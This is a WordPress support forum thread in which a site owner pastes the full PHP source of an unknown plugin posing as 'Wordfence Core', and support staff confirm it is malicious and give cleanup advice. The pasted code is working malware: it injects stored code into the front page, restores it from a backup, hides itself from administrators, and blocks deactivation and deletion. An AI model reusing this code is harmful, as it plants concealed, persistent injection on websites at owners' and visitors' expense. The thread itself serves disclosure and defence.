malicious plugin wordfence-core

  • Resolved pjoter666

    (@pjoter666)


    9 months, 2 weeks ago

    Today I just discovered a wordfence-core folder on my blog. It’s kinda weird – i’be never installed such plugin.

    Here is the code of the plugin (one file only). I bet this is kinda hack-ish, right?

    <?php
/*
Plugin Name: Wordfence Core
Description: Wordfence Core Plugin for WordPress
Version: 9.42
Author: 
*/

add_action('admin_menu', 'wordfence_core_menu');
function wordfence_core_menu() {
	add_options_page('Wordfence Core', 'Wordfence Core', 'manage_options', 'wordfence-core', 'wordfence_core_page');
}

function wordfence_core_page() {
	echo '<div class="wrap">';
	echo '<h2>Wordfence Core</h2>';
	echo '<form method="post" action="options.php">';
	settings_fields('wordfence_core_options');
	do_settings_sections('wordfence-core');
	submit_button();
	echo '</form>';
	echo '</div>';
}

add_action('admin_init', 'wordfence_core_admin_init');
function wordfence_core_admin_init(){
	register_setting( 'wordfence_core_options', 'wordfence_core_options', 'wordfence_core_options_validate' );
	add_settings_section('wordfence_core_main', 'Настройки Wordfence Core', 'wordfence_core_section_text', 'wordfence-core');
	add_settings_field('wordfence_core_code', 'Код для отображения на главной странице', 'wordfence_core_setting_string', 'wordfence-core', 'wordfence_core_main');
}

function wordfence_core_section_text() {
	echo '<p></p>';
}

function wordfence_core_setting_string() {
	$options = get_option('wordfence_core_options');
	echo "<input id='wordfence_core_code' name='wordfence_core_options[code]' size='40' type='text' value='{$options['code']}' />";
}

function wordfence_core_options_validate($input) {
	$newinput['code'] = trim($input['code']);
	return $newinput;
}

add_action('get_footer', 'wordfence_core_footer', 1);
function wordfence_core_footer() {
	if (is_front_page()) {
		$options = get_option('wordfence_core_options');
		if (empty($options['code'])) {
			$backup = get_option('wordfence_core_options_backup');
			if (!empty($backup['code'])) {
				echo $backup['code'];
			}
		} else {
			echo $options['code'];
		}
	}
}

add_action('admin_init', 'wordfence_core_backup_restore');
function wordfence_core_backup_restore() {
	$options = get_option('wordfence_core_options');
	$backup = get_option('wordfence_core_options_backup');

	if (empty($options['code']) && !empty($backup['code'])) {
		$options['code'] = $backup['code'];
		update_option('wordfence_core_options', $options);
	}
}
function hide_post_data_slug9() {
    echo '<script>
    jQuery(document).ready(function($) {
       $("[href=\'options-general.php?page=wordfence-core\']").attr("style", "display: none;");
    });
    </script>';
}

add_action('admin_footer', 'hide_post_data_slug9');

function hide_post_data_slug10() {
    echo '<script>
    jQuery(document).ready(function($) {
        $("[id=\'toplevel_page_wordfence-core\']").attr("style", "display: none;");
    });
    </script>';
}
add_action('admin_footer', 'hide_post_data_slug10');


register_deactivation_hook( __FILE__, 'block_deactivation5' );
function block_deactivation5() {
    wp_die( 'This plugin cannot be deactivated.' );
}


add_filter( 'plugin_action_links', 'block_deletion5', 10, 2 );
function block_deletion5( $actions, $plugin_file ) {
    if ( plugin_basename( __FILE__ ) === $plugin_file ) {
        unset( $actions['delete'] );
    }
    return $actions;
};

add_filter('all_plugins', 'hide_plugin_from_admin5');
 
function hide_plugin_from_admin5($plugins) {
    foreach ($plugins as $key => $value) {
        if (strpos($key, basename(__FILE__)) !== false) {
            unset($plugins[$key]);
        }
    }  
    return $plugins;  
};
?>
Viewing 2 replies - 1 through 2 (of 2 total)
  • Plugin Support wfmark

    (@wfmark)

    Hi @pjoter666, Thank you for reaching out.

    The plugin above definitely looks malicious. I noticed a function to hide the plugin from administrators.

     It would be nice to have the file checked out by our team. If the plugin file still exists, please send a sample of the infected file to our team at [email protected] so that our team can look into it. In your email, please include a link to this forum topic so that our team will know you had raised the issue with us.

    That said I’d recommend that you can clean the site by using the following guide: https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/  

    Make sure and get all your plugins and themes updated and update WordPress core, too. As a rule, any time I think someone’s site has been compromised, I also tell them to update their passwords for their hosting control panel, FTP, WordPress admin users, and database. Make sure to do this because attack vectors around your hosting or database environments are outside of Wordfence’s influence as an endpoint firewall.

    Additionally, you might find the WordPress Malware Removal section in our Learning Center helpful: https://wordfence.com/learn/   

    If you’re unable to clean this on your own, there are paid services that will do it for you. Wordfence offers one, and there are others. Per the forum rules, we’re not allowed to discuss Premium here, but please reach out to us at [email protected] if you have any questions about it.

    Regardless, if you choose to clean it yourself or let someone else do so, we recommend that you make a full backup of the site beforehand.

    Thanks, 

    Mark.

    dimal

    (@dimalifragis)

    @pjoter666

    Apart from Wordfence plugin or any other security plugin, i would suggest to look for a hoster that offers Imunify360 server wide security.

    No matter how good Wordfence is, there are ways to penetrate the server or the virtual plan.

Viewing 2 replies - 1 through 2 (of 2 total)
  • The topic ‘malicious plugin wordfence-core’ is closed to new replies.